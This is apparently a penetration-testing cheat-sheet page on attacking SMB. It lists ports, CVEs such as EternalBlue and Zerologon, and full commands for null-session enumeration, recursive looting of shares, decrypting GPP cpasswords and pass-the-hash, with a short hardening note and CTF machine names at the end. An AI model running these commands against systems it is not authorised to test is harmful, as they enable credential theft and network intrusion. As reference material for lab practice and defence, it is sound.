KagisoSec_
Service bank
FILE SHARE 139/tcp 445/tcp

SMB

aka Samba, CIFS, netbios-ssn

Windows/Samba file sharing on 139/445. Null and guest sessions enumerate shares and users; readable shares leak credentials; classic RCE CVEs and pass-the-hash live here.

windows smb file-share active-directory

Ports

PortProtoNotes
139tcpNetBIOS session
445tcpSMB over TCP

Fingerprint

  • nmap smb-os-discovery / smb2-security-mode
  • Domain and hostname leak via the SMB negotiate

Key files

PathHoldsSensitive
\\SYSVOL\...\Groups.xml GPP cpassword (AES key is public) sensitive
/etc/samba/smb.conf Samba config and share definitions (Linux)
non-default shares scripts, backups and configs that leak creds sensitive

Default / weak creds

  • guest / (empty) and null session

Known CVEs

CVEImpact
MS17-010EternalBlue, unauthenticated remote code execution
CVE-2020-1472Zerologon, domain controller takeover
CVE-2020-0796SMBGhost, SMBv3 compression RCE

Exploitation primitives

  • Null/guest session: enumerate shares, users and password policy (nxc, enum4linux-ng, smbclient)
  • Loot readable shares for creds/configs; GPP cpassword in SYSVOL decrypts to a domain password
  • Pass-the-hash and writable-share payload drops; RID cycling to enumerate users

Overview

SMB on 445 is one of the first things to test on Windows targets. Even without credentials, guest or null access often lists shares and users, and a single readable non-default share frequently hands over a password.

Enumeration

Guest session, list shares:

nxc smb <TARGET> -u 'guest' -p '' --shares

Null session, enumerate users:

nxc smb <TARGET> -u '' -p '' --users

List shares with smbclient:

smbclient -L //<TARGET> -U 'guest%'

Full automated enumeration:

enum4linux-ng -A <TARGET>

Connect to a share and pull files:

smbclient //<TARGET>/share -U 'user%pass'

Recursively mirror a share to loot offline:

smbclient //<TARGET>/share -U 'user%pass' -c 'recurse ON; prompt OFF; mget *'

GPP cpassword (SYSVOL)

Find the AES-encrypted cpassword in SYSVOL Groups.xml:

nxc smb <TARGET> -u user -p pass -M gpp_password

Decrypt a recovered cpassword blob (the AES key is public):

gpp-decrypt 'VPe/o9YRyz2cQjudVbF4xRcWZ4l1bnZ9q2cBKAZ4kZ4'

Notes

  • Any share outside ADMIN$, C$, IPC$, NETLOGON, SYSVOL is worth a look.
  • With a hash, nxc smb <TARGET> -u user -H <hash> for pass-the-hash.

Hardening

Disable guest/null access, require SMB signing, and patch the wormable CVEs.

Seen on these machines 6

Administrator Authority Media Voleur Fluffy Support

References